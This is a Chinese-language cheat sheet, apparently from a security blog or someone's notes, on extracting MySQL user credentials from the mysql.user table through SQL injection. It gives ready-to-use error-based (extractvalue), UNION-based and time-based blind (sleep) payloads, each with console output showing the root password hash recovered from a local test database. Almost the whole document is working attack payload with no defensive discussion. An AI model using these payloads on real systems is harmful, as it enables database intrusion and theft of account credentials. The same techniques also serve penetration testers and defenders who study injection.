0x00 记忆方式

select host, user, password from mysql.user

  1. mysql> select host, user, password from mysql.user;
  2. +-----------+------+-------------------------------------------+
  3. | host | user | password |
  4. +-----------+------+-------------------------------------------+
  5. | localhost | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
  6. | 127.0.0.1 | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
  7. | ::1 | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
  8. +-----------+------+-------------------------------------------+
  9. 3 rows in set (0.00 sec)

0x01 爆错注入获取

注意: limit 0 表示要显示那一条数据
limit 0 表示第一条
limit 1 表示第二条

select extractvalue(1,(select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1))

  1. mysql> select extractvalue(1,(select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1));
  2. ERROR 1105 (HY000): XPATH syntax error: '~localhost~root~*81F5E21E35407D8'

0x02 union联合注入获取

注意: limit 0 表示要显示那一条数据
limit 0 表示第一条
limit 1 表示第二条

  1. # 演示数据
  2. mysql> select * from test;
  3. +------+------+------+---------+
  4. | id | test | map | content |
  5. +------+------+------+---------+
  6. | 1 | 1 | 1 | 1 |
  7. | 2 | 2 | 2 | 2 |
  8. | 3 | 3 | 3 | 3 |
  9. +------+------+------+---------+
  10. 3 rows in set (0.00 sec)
  1. # 显示列数
  2. mysql> select * from test where 1=2 union select 1,2,3,4;
  3. +------+------+------+---------+
  4. | id | test | map | content |
  5. +------+------+------+---------+
  6. | 1 | 2 | 3 | 4 |
  7. +------+------+------+---------+
  8. 1 row in set (0.00 sec)
  1. # 显示数据
  2. mysql> select * from test where 1=2 union select 1,(select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),3,4;
  3. +------+-----------------------------------------------------------+------+---------+
  4. | id | test | map | content |
  5. +------+-----------------------------------------------------------+------+---------+
  6. | 1 | ~localhost~root~*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B | 3 | 4 |
  7. +------+-----------------------------------------------------------+------+---------+
  8. 1 row in set (0.00 sec)

0x03 盲注获取

  1. # 测试数据
  2. mysql> select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1;
  3. +-----------------------------------------------------------+
  4. | concat(0x7e,host,0x7e,user,0x7e,password) |
  5. +-----------------------------------------------------------+
  6. | ~localhost~root~*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
  7. +-----------------------------------------------------------+
  8. 1 row in set (0.00 sec)

读 mysql.user表第一条数据第一个字: select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),1,1)=’~’,sleep(5),1);

  1. mysql> select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),1,1)='~',sleep(5),1);
  2. Empty set (5.00 sec)

读 mysql.user表第一条数据第二个字: select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),2,1)=’l’,sleep(5),1);

  1. mysql> select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),2,1)='l',sleep(5),1);
  2. Empty set (5.00 sec)